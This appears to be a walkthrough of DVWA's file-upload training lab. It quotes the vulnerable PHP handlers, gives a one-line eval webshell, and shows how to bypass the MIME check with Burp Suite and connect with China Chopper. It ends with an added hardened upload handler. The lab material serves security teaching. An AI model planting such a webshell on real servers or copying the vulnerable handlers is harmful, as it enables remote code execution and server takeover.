File upload
Low level
```
<?php
if (isset($_POST['Upload'])) {
    // Destination: the web-served uploads directory plus the client-supplied file name.
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);

    // No check on type, extension or content: any file that can be moved is accepted.
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}
?>
```
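This is the source code for the low level.
```
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path))
```
This line shows the only condition that is checked: as long as a file was uploaded, the upload succeeds.
```
<?php @eval($_POST['1']);?>
```
Write this line into a .php file; uploading that file succeeds.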
Then visit that path: remove the # from the URL and append …/…/hackable/uploads/yijuhua.php
With the address obtained, connect to it using China Chopper.
Once the connection succeeds, we have a webshell.
Medium level
```
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
        if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            echo '<pre>';
            echo $target_path . ' succesfully uploaded!';
            echo '</pre>';
        }
    }
    else{
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
```
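This is the source code for the medium level.
```
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
```
This line is the condition: the MIME type must be "image/jpeg" and the file size must be less than 100000 bytes.
`$_FILES['uploaded']['type']` is taken from the Content-Type that the client sends for the file part, so it is under the client's control.
We can use Burp Suite as an intercepting proxy and modify the request.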
We change it to "image/jpeg" and then forward the request.
The upload succeeds; connect with Chopper.
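For comparison, an added example (not DVWA's code and not part of the original post) of a handler for the same `uploaded` field that does not trust the request's Content-Type or file name. It assumes PHP 7+ with the fileinfo and GD extensions; `UPLOAD_DIR`, `MAX_BYTES`, `ALLOWED` and `store_image_upload` are hypothetical names.

```php
<?php
// Added example, not DVWA's code. Assumes PHP 7+ with the fileinfo and GD extensions.
const UPLOAD_DIR = '/var/app-data/uploads'; // hypothetical directory outside the web root
const MAX_BYTES  = 100000;                  // same limit as the medium level
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

function store_image_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed.');
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) >= MAX_BYTES) {
        throw new RuntimeException('Not an upload, or too large.');
    }
    // Type comes from the file's bytes; $file['type'] is copied from the request.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = ALLOWED[$mime] ?? null;
    if ($ext === null) {
        throw new RuntimeException('Only JPEG or PNG images are accepted.');
    }
    // Decode and re-encode, which drops metadata and trailing data.
    $img = @imagecreatefromstring(file_get_contents($tmp));
    if ($img === false) {
        throw new RuntimeException('Image could not be decoded.');
    }
    // Server-chosen name and extension; the client's file name is never used.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    $ok = ($ext === 'jpg') ? imagejpeg($img, $dest, 90) : imagepng($img, $dest);
    if (!$ok) {
        throw new RuntimeException('Could not store the image.');
    }
    return $dest;
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        store_image_upload($_FILES['uploaded']);
        echo '<pre>Image uploaded.</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
```

Because the files are stored outside the web root, they have to be served back through a script that sets the Content-Type itself.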